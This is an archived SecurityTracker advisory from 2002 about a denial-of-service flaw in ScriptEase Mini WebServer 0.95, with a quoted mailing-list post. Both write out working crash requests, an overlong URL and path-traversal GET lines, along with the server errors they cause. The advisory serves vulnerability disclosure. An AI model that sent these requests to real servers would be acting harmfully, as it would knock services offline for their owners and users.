SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   ScriptEase Mini WebServer Vendors:   Nombas, Inc.
(Additional Exploit Methods Are Provided) Re: ScriptEase Mini WebServer Can Be Crashed By Remote Users Sending Long HTTP Requests
SecurityTracker Alert ID:  1003608
SecurityTracker URL:  http://securitytracker.com/id/1003608
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 20 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 0.95, possibly others
Description:   SecurityOffice.net reported a denial of service vulnerability in the ScriptEase Mini WebServer. A remote user can crash the web services.

In the original alert, it was reported that a remote user can submit a long HTTP request to cause the web server to crash:

http://[targethost]/AAAAAA...(Ax2000)...AAAAAA

A user has added that there are other methods to cause the server to crash:

GET /%2e%2e/ HTTP/1.0
GET /../../../../../../../../../ HTTP/1.0
GET HTTP/1.0
GET ../../../../../../../../../../ HTTP/1.0

Impact:   A remote user can crash the web services. A restart is required to return the web services to normal operations.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.nombas.com/us/download/ndownload.htm (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Feb 19 2002 ScriptEase Mini WebServer Can Be Crashed By Remote Users Sending Long HTTP Requests



 Source Message Contents

Subject:  Four More ScriptEase MiniWeb Server v0.95 DoS Attacks



The following are four more Server Denial of Service Attacks against 
ScriptEase MiniWeb Server 0.95.

These attacks do not make the server point to an invalid memory address 
like the previous post.

I believe the first two attacks I describe are internal server problems 
due to either coding errors or incomplete coding. The second two may 
just be configuration problems on my part, as this assessment was done 
fairly quickly.

After we receieve "Press a key..." on the server side, the server stops 
and needs to be manually restarted.

Thanks to Tamer Sahin for his earlier post.
(http://www.securityfocus.com/archive/1/257031)

Cheers,
'ken'@FTU


<--------------- BOF ------------->

Dos One.
We Send:
GET /%2e%2e/ HTTP/1.0

ScriptEase Internal Server Reply:
1512: Cannot compare variable of different dimension.
Press a key...

=======

Dos Two.
We Send:
GET /../../../../../../../../../ HTTP/1.0

ScriptEase Internal Server Reply:
1512: Cannot compare variable of different dimension.
Press a key...

=======

Dos Three.
We Send:
GET HTTP/1.0

ScriptEase Internal Server Reply:
5108: Invalid VA_LIST.
Press a key...

=======

Dos Four.
We Send:
GET ../../../../../../../../../../ HTTP/1.0

ScriptEase Internal Server Reply:
5108: Invalid VA_LIST.
Press a key...


<--------------- EOF ------------->




-- 
"I grew convinced that truth, sincerity and integrity in dealings 
between man and man were of the utmost importance to the felicity of 
life, and I formed a written resolution to practise them ever while I 
lived."
	-Benjamin Franklin, The Autobiography of Benjamin Franklin


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC